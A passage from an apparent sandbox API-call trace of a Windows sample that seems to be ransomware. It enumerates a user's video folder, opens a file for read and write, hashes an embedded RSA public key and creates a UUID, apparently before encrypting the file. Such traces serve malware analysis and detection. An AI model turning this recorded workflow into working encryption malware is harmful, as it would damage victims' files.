lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0195.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0195.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0195.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0195.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0195.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0195.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.694] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\") returned="cvfGVyFL7tFjUO7\\" [0195.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9eb8 [0195.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.695] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0195.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9eb8 | out: hHeap=0x2c0000) returned 1 [0195.695] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.696] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.696] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.696] PathFindFileNameW (pszPath="") returned="" [0195.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.696] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe138b9c0, ftCreationTime.dwHighDateTime=0x1d89a97, ftLastAccessTime.dwLowDateTime=0xd50a4720, ftLastAccessTime.dwHighDateTime=0x1d89e81, ftLastWriteTime.dwLowDateTime=0xd50a4720, ftLastWriteTime.dwHighDateTime=0x1d89e81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0195.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.699] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe138b9c0, ftCreationTime.dwHighDateTime=0x1d89a97, ftLastAccessTime.dwLowDateTime=0xd50a4720, ftLastAccessTime.dwHighDateTime=0x1d89e81, ftLastWriteTime.dwLowDateTime=0xd50a4720, ftLastWriteTime.dwHighDateTime=0x1d89e81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.699] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b06e3f0, ftCreationTime.dwHighDateTime=0x1d897ba, ftLastAccessTime.dwLowDateTime=0xba9eb910, ftLastAccessTime.dwHighDateTime=0x1d8a648, ftLastWriteTime.dwLowDateTime=0xba9eb910, ftLastWriteTime.dwHighDateTime=0x1d8a648, nFileSizeHigh=0x0, nFileSizeLow=0x1628c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7lrwy.flv", cAlternateFileName="")) returned 1 [0195.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.699] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\7lrwy.flv") returned=".flv" [0195.699] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\7lrwy.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\7lrwy.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.701] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=90764) returned 1 [0195.701] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.704] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16266, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.704] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.707] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.707] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1628c, lpOverlapped=0x0) returned 1 [0195.708] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.709] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.709] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.709] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.710] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.710] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.710] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.710] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.710] GetLastError () returned 0x0 [0195.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.710] GetLastError () returned 0x0 [0195.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.711] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.711] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.711] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.711] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.711] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16290) returned 0x2af5168 [0195.712] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9eb8 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9f00 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.713] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0195.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64d0 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae64b8 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.715] RtlAllocateHeap (HeapHandle=0x2c0000, 